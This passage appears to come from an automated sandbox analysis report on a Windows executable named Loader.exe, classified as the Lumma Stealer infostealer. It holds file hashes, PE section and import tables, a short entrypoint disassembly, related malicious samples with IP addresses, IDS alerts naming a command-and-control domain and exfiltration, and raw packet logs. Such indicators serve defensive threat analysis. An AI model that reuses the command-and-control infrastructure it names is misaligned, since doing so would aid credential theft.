	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.52.90
	setup.msi	Get hash	malicious	Unknown	Browse	188.114.97.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	104.21.24.64
	over.ps1	Get hash	malicious	Vidar	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	PASS-1234.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
	Delta.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	172.67.157.249

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.820129189224153
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Loader.exe
File size:	816'640 bytes
MD5:	287009edb0ce8e161d3a6328864fcf30
SHA1:	888dffb2851bae70ceeaf18d0ab2abd6361d3976
SHA256:	7c13fd5a81f9aeca85799bc1cff61329599d032569287d8b2db7b43d3a51df30
SHA512:	d56db6586ccf6baa98e5d012f24c904067bf20b5c3e27d3fd48507b5a7ef638b3cce3f08c7777b9438089966d9391499061a7a49d77e60aca2bcee9e29f197a6
SSDEEP:	24576:BK1PSMZcebOLk5iXTQs7HebOLk5iXTQs7m:E1PS498mMQc+8mMQcm
TLSH:	DD050191B980C0B2D857157744FADBB6053EB9700F426ACF93D81F3A8F642D1AB31B5A
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....sg.................H........................@.......................................@.....................................(..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40a2e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6773E4A4 [Tue Dec 31 12:33:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	019ac8c6e24f80fb88de699b6749f599

Entrypoint Preview

Instruction
call 00007F8244CA1AAAh
jmp 00007F8244CA190Dh
mov ecx, dword ptr [004307C0h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F8244CA1AA6h
test esi, ecx
jne 00007F8244CA1AC8h
call 00007F8244CA1AD1h
mov ecx, eax
cmp ecx, edi
jne 00007F8244CA1AA9h
mov ecx, BB40E64Fh
jmp 00007F8244CA1AB0h
test esi, ecx
jne 00007F8244CA1AACh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [004307C0h], ecx
not ecx
pop edi
mov dword ptr [00430800h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0042E8D8h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0042E894h]
xor dword ptr [ebp-04h], eax
call dword ptr [0042E890h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0042E920h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00431AB8h
call dword ptr [0042E8F8h]
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov al, 01h
ret
push 00030000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e6c4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0xe8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x35000	0x1b90	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2a9a8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x26e40	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e834	0x148	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x247da	0x24800	ba0610d1e4ecb6f5f64959d9eb5b455a	False	0.5549951840753424	data	6.559506263512015	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x26000	0x9eb4	0xa000	53eba87ddc7d2455b0ac2836680b1660	False	0.428271484375	DOS executable (COM)	4.9181666163124085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x30000	0x2280	0x1600	112d0c9e43893ae5b7f96d23807996ac	False	0.39506392045454547	data	4.581141173428789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x33000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x34000	0xe8	0x200	03d6bf5d1e31277fc8fb90374111d794	False	0.306640625	data	2.344915704357875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x35000	0x1b90	0x1c00	3080b38ba0e27b64b3ab5ca0f93c1c7c	False	0.7785993303571429	data	6.532705218372571	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0x37000	0x4a800	0x4a800	a8cd144a48a8381dc0aa0b30bed69672	False	1.000330982592282	data	7.999411018694849	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.BSS	0x82000	0x4a800	0x4a800	a8cd144a48a8381dc0aa0b30bed69672	False	1.000330982592282	data	7.999411018694849	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x34060	0x87	XML 1.0 document, ASCII text	English	United States	0.8222222222222222

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T17:42:27.392052+0100	2058626	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stingyerasjhru .click)	1	192.168.11.20	52464	1.1.1.1	53	UDP
2024-12-31T17:42:27.808066+0100	2058627	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)	1	192.168.11.20	49755	172.67.157.249	443	TCP
2024-12-31T17:42:27.808066+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49755	172.67.157.249	443	TCP
2024-12-31T17:42:28.480934+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.11.20	49755	172.67.157.249	443	TCP
2024-12-31T17:42:28.480934+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49755	172.67.157.249	443	TCP
2024-12-31T17:42:28.757362+0100	2058627	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)	1	192.168.11.20	49756	172.67.157.249	443	TCP
2024-12-31T17:42:28.757362+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49756	172.67.157.249	443	TCP
2024-12-31T17:42:29.480257+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.11.20	49756	172.67.157.249	443	TCP
2024-12-31T17:42:29.480257+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49756	172.67.157.249	443	TCP
2024-12-31T17:42:30.125095+0100	2058627	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)	1	192.168.11.20	49757	172.67.157.249	443	TCP
2024-12-31T17:42:30.125095+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49757	172.67.157.249	443	TCP
2024-12-31T17:42:31.498061+0100	2058627	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)	1	192.168.11.20	49758	172.67.157.249	443	TCP
2024-12-31T17:42:31.498061+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49758	172.67.157.249	443	TCP
2024-12-31T17:42:32.356036+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.11.20	49758	172.67.157.249	443	TCP
2024-12-31T17:42:32.922949+0100	2058627	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)	1	192.168.11.20	49759	172.67.157.249	443	TCP
2024-12-31T17:42:32.922949+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49759	172.67.157.249	443	TCP
2024-12-31T17:42:34.575563+0100	2058627	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)	1	192.168.11.20	49760	172.67.157.249	443	TCP
2024-12-31T17:42:34.575563+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49760	172.67.157.249	443	TCP
2024-12-31T17:42:36.328647+0100	2058627	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)	1	192.168.11.20	49761	172.67.157.249	443	TCP
2024-12-31T17:42:36.328647+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49761	172.67.157.249	443	TCP
2024-12-31T17:42:40.735775+0100	2058627	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stingyerasjhru .click in TLS SNI)	1	192.168.11.20	49762	172.67.157.249	443	TCP
2024-12-31T17:42:40.735775+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49762	172.67.157.249	443	TCP
2024-12-31T17:42:41.414171+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49762	172.67.157.249	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 17:42:27.533720970 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:27.533759117 CET	443	49755	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:27.534007072 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:27.536238909 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:27.536257029 CET	443	49755	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:27.807748079 CET	443	49755	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:27.808065891 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:27.815330029 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:27.815340996 CET	443	49755	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:27.815583944 CET	443	49755	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:27.858383894 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:27.861517906 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:27.861517906 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:27.861594915 CET	443	49755	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:28.480927944 CET	443	49755	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:28.480988026 CET	443	49755	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:28.481157064 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:28.482935905 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:28.482935905 CET	49755	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:28.482948065 CET	443	49755	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:28.482952118 CET	443	49755	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:28.488955021 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:28.488976002 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:28.489154100 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:28.489298105 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:28.489306927 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:28.757148027 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:28.757361889 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:28.758467913 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:28.758479118 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:28.758723021 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:28.759959936 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:28.759959936 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:28.760037899 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.480218887 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.480334997 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.480422974 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.480499983 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.480555058 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.480613947 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.480716944 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.480773926 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.480813026 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.480901957 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.480917931 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.481095076 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.481210947 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.481604099 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.481719017 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.481810093 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.481833935 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.481851101 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.481969118 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.481995106 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.482144117 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.482161045 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.482197046 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.482244968 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.482434034 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.482498884 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.482498884 CET	49756	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.482547045 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.482563019 CET	443	49756	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.858356953 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.858377934 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:29.858525991 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.858762980 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:29.858769894 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:30.124845982 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:30.125094891 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:30.126122952 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:30.126133919 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:30.126377106 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:30.127736092 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:30.127850056 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:30.127902985 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:30.127918005 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:30.127931118 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:30.127991915 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:30.128150940 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:30.128196955 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:31.039855003 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:31.040004969 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:31.040137053 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:31.040230036 CET	49757	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:31.040251017 CET	443	49757	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:31.228535891 CET	49758	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:31.228560925 CET	443	49758	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:31.228756905 CET	49758	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:31.229012966 CET	49758	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:31.229024887 CET	443	49758	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:31.497827053 CET	443	49758	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:31.498060942 CET	49758	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:31.499088049 CET	49758	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:31.499110937 CET	443	49758	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:31.499629974 CET	443	49758	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:31.500669003 CET	49758	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:31.500782967 CET	49758	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:31.500828981 CET	443	49758	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:31.500832081 CET	49758	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:31.500853062 CET	443	49758	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.356039047 CET	443	49758	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.356276989 CET	443	49758	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.356436968 CET	49758	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.356523037 CET	49758	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.356555939 CET	443	49758	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.656225920 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.656276941 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.656513929 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.656750917 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.656785011 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.922565937 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.922949076 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.923926115 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.923938990 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.924174070 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.925245047 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.925270081 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.925308943 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.925321102 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.925338984 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.925411940 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.925422907 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:32.925563097 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:32.925615072 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:33.661077023 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:33.661187887 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:33.661366940 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:33.661560059 CET	49759	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:33.661581039 CET	443	49759	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:34.305808067 CET	49760	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:34.305845022 CET	443	49760	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:34.306034088 CET	49760	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:34.306274891 CET	49760	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:34.306293964 CET	443	49760	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:34.575256109 CET	443	49760	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:34.575562954 CET	49760	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:34.576514006 CET	49760	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:34.576530933 CET	443	49760	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:34.576864004 CET	443	49760	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:34.577945948 CET	49760	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:34.578058958 CET	49760	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:34.578078985 CET	443	49760	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:35.280762911 CET	443	49760	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:35.280883074 CET	443	49760	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:35.281111002 CET	49760	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:35.281187057 CET	49760	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:35.281202078 CET	443	49760	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.061783075 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.061809063 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.062067986 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.062304974 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.062314034 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.328341007 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.328646898 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.329427004 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.329435110 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.329662085 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.330682039 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.331887960 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.331912994 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.331938982 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.331963062 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.331970930 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.332154989 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.332212925 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.332381964 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.332441092 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.332571983 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.332587004 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.332978010 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.332986116 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.333031893 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.333038092 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.333076000 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.333081007 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.333270073 CET	49761	443	192.168.11.20	172.67.157.249
